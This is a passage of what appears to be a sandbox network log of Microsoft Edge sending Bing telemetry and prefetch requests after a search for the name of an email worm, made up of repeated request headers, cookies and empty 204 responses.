cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: SRCHUSR=DOB=20250312&T=1741747022000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-03-11T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-03-12T02:37:03.7285063+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-03-12
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=BingPages
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1741747023&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCfI3oNhq3R-M_Adq3ibpKMTqAipbsqrFuDOskoN1OX-zRv9o2wNWUZtAZt_SM9dx4IKLh7VhBdHXyScnVD2ILO2111NoxVqX3s9NHHKLjoTizAU-SX1WpFxOPFXQEyNulS7gxYjjJ9qCffZ8mRL_2qh&WTS=63877343822
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|&BLOCK=TS=250312023704
cookie: SRCHS=PC=U531

Response

HTTP/2.0 200

content-length: 64
content-type: text/html; charset=utf-8
access-control-allow-origin: https://www.bing.com
cache-control: no-cache, no-store, must-revalidate
content-encoding: br
expires: -1
pragma: no-cache
vary: Accept-Encoding
x-eventid: 67d0f352b2cb42f79af658cef27e9884
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-M6sMdf7botyHQNhUA5KeSVKYiZsZZsolmeEVtJzEm78='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Wed, 12 Mar 2025 02:37:07 GMT
set-cookie: SRCHS=; domain=.bing.com; expires=Thu, 01-Jan-1970 08:00:00 GMT; path=/; secure; SameSite=None
set-cookie: SRCHS=; expires=Thu, 01-Jan-1970 08:00:00 GMT; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747026.32e008b
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

88.221.135.33:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 1099
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: SRCHUSR=DOB=20250312&T=1741747022000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-03-11T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-03-12T02:37:03.7285063+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-03-12
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=BingPages
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1741747023&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCfI3oNhq3R-M_Adq3ibpKMTqAipbsqrFuDOskoN1OX-zRv9o2wNWUZtAZt_SM9dx4IKLh7VhBdHXyScnVD2ILO2111NoxVqX3s9NHHKLjoTizAU-SX1WpFxOPFXQEyNulS7gxYjjJ9qCffZ8mRL_2qh&WTS=63877343822
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|&BLOCK=TS=250312023704
cookie: ipv6=hit=1741750626248&t=4

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Wed, 12 Mar 2025 02:37:11 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747031.32e0f6b
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

88.221.135.33:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 884
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: SRCHUSR=DOB=20250312&T=1741747022000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-03-11T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-03-12T02:37:03.7285063+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-03-12
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=BingPages
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1741747023&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCfI3oNhq3R-M_Adq3ibpKMTqAipbsqrFuDOskoN1OX-zRv9o2wNWUZtAZt_SM9dx4IKLh7VhBdHXyScnVD2ILO2111NoxVqX3s9NHHKLjoTizAU-SX1WpFxOPFXQEyNulS7gxYjjJ9qCffZ8mRL_2qh&WTS=63877343822
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|&BLOCK=TS=250312023704
cookie: ipv6=hit=1741750626248&t=4

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Wed, 12 Mar 2025 02:37:12 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747032.32e1569
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

88.221.135.33:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 744
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: SRCHUSR=DOB=20250312&T=1741747022000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-03-11T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-03-12T02:37:03.7285063+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-03-12
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=BingPages
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1741747023&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCfI3oNhq3R-M_Adq3ibpKMTqAipbsqrFuDOskoN1OX-zRv9o2wNWUZtAZt_SM9dx4IKLh7VhBdHXyScnVD2ILO2111NoxVqX3s9NHHKLjoTizAU-SX1WpFxOPFXQEyNulS7gxYjjJ9qCffZ8mRL_2qh&WTS=63877343822
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|&BLOCK=TS=250312023704
cookie: ipv6=hit=1741750626248&t=4

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Wed, 12 Mar 2025 02:37:22 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747042.32e35c4
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

88.221.135.33:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 260
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: SRCHUSR=DOB=20250312&T=1741747022000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-03-11T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-03-12T02:37:03.7285063+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-03-12
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=BingPages
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1741747023&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCfI3oNhq3R-M_Adq3ibpKMTqAipbsqrFuDOskoN1OX-zRv9o2wNWUZtAZt_SM9dx4IKLh7VhBdHXyScnVD2ILO2111NoxVqX3s9NHHKLjoTizAU-SX1WpFxOPFXQEyNulS7gxYjjJ9qCffZ8mRL_2qh&WTS=63877343822
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|&BLOCK=TS=250312023704
cookie: ipv6=hit=1741750626248&t=4

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Wed, 12 Mar 2025 02:37:22 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747042.32e35c7
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

88.221.135.33:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 689
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: SRCHUSR=DOB=20250312&T=1741747022000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-03-11T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-03-12T02:37:03.7285063+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-03-12
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=BingPages
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1741747023&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCfI3oNhq3R-M_Adq3ibpKMTqAipbsqrFuDOskoN1OX-zRv9o2wNWUZtAZt_SM9dx4IKLh7VhBdHXyScnVD2ILO2111NoxVqX3s9NHHKLjoTizAU-SX1WpFxOPFXQEyNulS7gxYjjJ9qCffZ8mRL_2qh&WTS=63877343822
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|&BLOCK=TS=250312023704
cookie: ipv6=hit=1741750626248&t=4

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Wed, 12 Mar 2025 02:37:22 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747042.32e35d3
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

88.221.135.33:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 275
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: SRCHUSR=DOB=20250312&T=1741747022000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-03-11T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-03-12T02:37:03.7285063+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-03-12
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=BingPages
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1741747023&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCfI3oNhq3R-M_Adq3ibpKMTqAipbsqrFuDOskoN1OX-zRv9o2wNWUZtAZt_SM9dx4IKLh7VhBdHXyScnVD2ILO2111NoxVqX3s9NHHKLjoTizAU-SX1WpFxOPFXQEyNulS7gxYjjJ9qCffZ8mRL_2qh&WTS=63877343822
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|&BLOCK=TS=250312023704
cookie: ipv6=hit=1741750626248&t=4

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Wed, 12 Mar 2025 02:37:22 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747042.32e35d0
GET

https://r.bing.com/rp/4wjOZJjaSsgGGb1Dq7f4iHLH5Xs.br.css

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/4wjOZJjaSsgGGb1Dq7f4iHLH5Xs.br.css HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: application/signed-exchange;v=b3;q=0.9,*/*;q=0.8
purpose: prefetch
sec-fetch-site: same-site
